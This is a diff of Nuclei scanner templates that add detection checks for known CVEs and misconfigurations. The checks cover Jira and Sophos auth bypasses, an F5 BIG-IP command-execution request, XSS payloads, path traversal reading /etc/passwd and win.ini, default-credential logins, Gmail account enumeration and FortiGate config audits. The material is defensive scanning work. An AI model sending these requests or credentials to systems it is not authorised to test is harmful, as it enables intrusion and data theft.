- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "></iframe><script>alert(1)</script>"
- "adsf/js/"
condition: and

View File

@ -8,12 +8,12 @@ info:
remediation: Fixed in version 2.7.12
reference:
- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
tags: cve,cve2022,wordpress,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0288
cwe-id: CWE-79
tags: cve,cve2022,wordpress,xss
requests:
- method: POST

View File

@ -0,0 +1,36 @@
id: CVE-2022-0540
info:
name: Atlassian Jira - Authentication bypass in Seraph
author: DhiyaneshDK
severity: critical
description: |
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-0540
cwe-id: CWE-287
requests:
- method: GET
path:
- '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'General Insight Configuration'
- type: status
status:
- 200

View File

@ -0,0 +1,45 @@
id: CVE-2022-1040
info:
name: Sophos Firewall - RCE
author: For3stCo1d
severity: critical
description: |
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
reference:
- https://github.com/killvxk/CVE-2022-1040
- https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
- https://nvd.nist.gov/vuln/detail/CVE-2022-1040
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 9.8
cve-id: CVE-2022-1040
cwe-id: CWE-287
metadata:
verified: true
shodan-query: http.title:"Sophos"
tags: cve,cve2022,sophos,firewall,auth-bypass
requests:
- method: POST
path:
- "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"
headers:
X-Requested-With: "XMLHttpRequest"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"status\":\"Session Expired\"}"
- type: word
part: header
words:
- "Server: xxxx"
- type: status
status:
- 200

View File

@ -0,0 +1,49 @@
id: CVE-2022-1388
info:
name: F5 BIG-IP iControl REST Auth Bypass RCE
author: dwisiswant0
severity: critical
description: |
This vulnerability may allow an unauthenticated attacker
with network access to the BIG-IP system through the management
port and/or self IP addresses to execute arbitrary system commands,
create or delete files, or disable services. There is no data plane
exposure; this is a control plane issue only.
reference:
- https://twitter.com/GossiTheDog/status/1523566937414193153
- https://support.f5.com/csp/article/K23605346
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-1388
cwe-id: CWE-306
metadata:
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
verified: true
tags: bigip,cve,cve2022,rce,mirai
variables:
auth: "admin:"
requests:
- raw:
- |
POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
{
"command": "run",
"utilCmdArgs": "-c id"
}
matchers:
- type: word
words:
- "commandResult"
- "uid="
condition: and

View File

@ -0,0 +1,33 @@
id: CVE-2022-1439
info:
name: Microweber Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
classification:
cve-id: CVE-2022-1439
metadata:
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss
requests:
- method: GET
path:
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition: and

View File

@ -0,0 +1,32 @@
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite - Directory Traversal
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
reference:
- https://0day.today/exploit/37579
- https://www.cvedetails.com/cve/CVE-2022-26233
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
tags: cve,cve2022,barco,lfi
requests:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

View File

@ -8,6 +8,8 @@ info:
reference:
- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
classification:
cve-id: CVE-2022-26352
tags: cve,cve2022,rce,dotcms
requests:

View File

@ -0,0 +1,41 @@
id: CVE-2022-29548
info:
name: WSO2 Management Console - Reflected XSS
author: edoardottt
severity: medium
description: |
A reflected XSS issue exists in the Management Console of several WSO2 products.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29548
cwe-id: CWE-79
metadata:
verified: true
google-dork: inurl:"carbon/admin/login"
tags: cve,cve2022,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: panabit-ixcache-default-login
info:
name: Panabit iXCache Default Login
author: ritikchaddha
severity: high
reference:
- http://forum.panabit.com/thread-10830-1-1.html
tags: ixcache,default-login,panabit
requests:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- ixcache
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- "URL=/cgi-bin/monitor.cgi"
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: telecom-gateway-default-login
info:
name: Telecom Gateway Default Login
author: ritikchaddha
severity: high
tags: telecom,default-login,gateway
requests:
- raw:
- |
POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Name={{username}}&Pass={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>电信网关服务器管理后台</title>"
- "index-shang.php"
- "di.php"
condition: and
- type: status
status:
- 200

View File

@ -2,16 +2,19 @@ id: panabit-default-login
info:
name: Panabit Gateway Default Login
author: pikpikcu
author: pikpikcu,ritikchaddha
severity: high
description: Panabit Gateway default credentials were discovered.
reference:
- https://max.book118.com/html/2017/0623/117514590.shtm
- https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
- https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
fofa-query: app="Panabit-智能网关"
tags: panabit,default-login
requests:
@ -26,31 +29,36 @@ requests:
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="{{username}}"
Content-Disposition: form-data; name="username"
admin
{{username}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="{{password}}"
Content-Disposition: form-data; name="password"
panabit
{{password}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
payloads:
username:
- username
- admin
password:
- password
- panabit
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
part: body
condition: and
- type: word
part: header
words:
- "paonline_admin"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: bigip-icontrol-rest
info:
name: F5 BIG-IP iControl REST Panel
author: MrCl0wnLab
severity: info
description: |
Undisclosed requests may bypass iControl REST authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
metadata:
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
tags: panel,bigip,f5
requests:
- method: GET
path:
- "{{BaseURL}}/mgmt/shared/authn/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "resterrorresponse"
- type: status
status:
- 401

View File

@ -6,6 +6,8 @@ info:
severity: info
reference:
- https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: panel,coldfusion,adobe
requests:

View File

@ -0,0 +1,27 @@
id: rg-uac-panel
info:
name: RG-UAC Ruijie Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Get_Verify_Info"
tags: panel,ruijie,router,firewall
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "dkey_check.php"
- "get_dkey_passwd"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: auto-usb-install
info:
name: Auto USB Installation Enabled
author: pussycat0x
severity: info
description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set auto-install-config disable"
- "set auto-install-image disable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,28 @@
id: heuristic-scan
info:
name: Heuristic scanning is not configured
author: pussycat0x
severity: info
description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "config antivirus heuristic"
- "set mode block"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: inactivity-timeout
info:
name: Inactivity Timeout Not Implemented
author: pussycat0x
severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-console-timeout"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: maintainer-account
info:
name: Maintainer Account Not Implemented
author: pussycat0x
severity: info
description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-maintainer"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: password-policy
info:
name: Password Policy not Set
author: pussycat0x
severity: info
description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "config system password-policy"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: remote-auth-timeout
info:
name: Remote Authentication timeout not set
author: pussycat0x
severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set remoteauthtimeout"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: scp-admin
info:
name: Admin-SCP Disabled
author: pussycat0x
severity: info
description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-scp enable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,27 @@
id: strong-ciphers
info:
name: HTTPS/SSH Strong Ciphers Not Enabled
author: pussycat0x
severity: info
description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set strong-crypto enable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or

View File

@ -0,0 +1,20 @@
id: valid-gmail-checker
info:
name: Valid Google Mail Checker
author: dievus,dwisiswant0
severity: info
reference:
- https://github.com/dievus/geeMailUserFinder
self-contained: true
requests:
- method: HEAD
path:
- "https://mail.google.com/mail/gxlu?email={{email}}"
matchers:
- type: word
part: header
words:
- "COMPASS"

View File

@ -0,0 +1,37 @@
id: insecure-firebase-database
info:
name: Insecure Firebase Database
author: rafaelwdornelas
severity: high
description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
reference:
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
metadata:
verified: true
tags: firebase,google,misconfig
requests:
- raw:
- |
PUT /{{randstr}}.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":"insecure-firebase-database"}
- |
GET /{{randstr}}.json HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{"id":"insecure-firebase-database"}'
- type: status
status:
- 200

View File

@ -29,6 +29,7 @@ requests:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh

View File

@ -21,21 +21,27 @@ requests:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
- |+
GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist
- |+
GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1
- |+
GET http://localhost/ HTTP/1.1
Host: localhost
- |+
GET https://localhost/ HTTP/1.1
Host: localhost
unsafe: true
req-condition: true
stop-at-first-match: true

View File

@ -61,4 +61,4 @@ requests:
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# Updated by Chris on 2022/01/21
# Enhanced by cs on 2022/01/21

View File

@ -0,0 +1,27 @@
id: unauthenticated-nginx-dashboard
info:
name: Nginx Dashboard
author: BibekSapkota (sar00n)
severity: low
reference:
- https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-nginx-dashboard/
metadata:
shpdan-query: html:"NGINX+ Dashboard"
tags: misconfig,nginx
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard.html"
max-size: 2048
matchers-condition: and
matchers:
- type: word
words:
- 'Nginx+ Dashboard'
- type: status
status:
- 200

View File

@ -18,8 +18,9 @@ network:
- "{{Host}}:9000"
read-size: 100
matchers:
- type: word
words:
- "ClickHouse"
- "UTC"
condition: and

View File

@ -5,6 +5,9 @@ info:
author: philippedelteil
severity: info
description: With this template we can detect the version number of Coldfusion instances based on their logos.
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion
requests:

View File

@ -7,6 +7,9 @@ info:
description: With this template we can detect a running ColdFusion instance due to an error page.
reference:
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: adobe,coldfusion
requests:

View File

@ -1,8 +1,8 @@
id: nginx-version
info:
name: nginx version detect
author: philippedelteil
name: Nginx version detect
author: philippedelteil,daffainfo
severity: info
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
tags: tech,nginx
@ -11,20 +11,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "nginx+"
- 'nginx/[0-9.]+'
- type: status
status:
- 200
extractors:
- type: kval
- type: regex
part: header
kval:
- Server
regex:
- 'nginx/[0-9.]+'

View File

@ -9,9 +9,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
matchers:
- type: regex
part: body
part: header
regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'

View File

@ -2,8 +2,10 @@ id: huijietong-cloud-fileread
info:
name: Huijietong Cloud File Read
author: princechaddha
author: princechaddha,ritikchaddha
severity: high
metadata:
fofa-query: body="/him/api/rest/v1.0/node/role"
tags: huijietong,lfi
requests:
@ -12,12 +14,19 @@ requests:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/Windows/win.ini'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:

Some files were not shown because too many files have changed in this diff Show More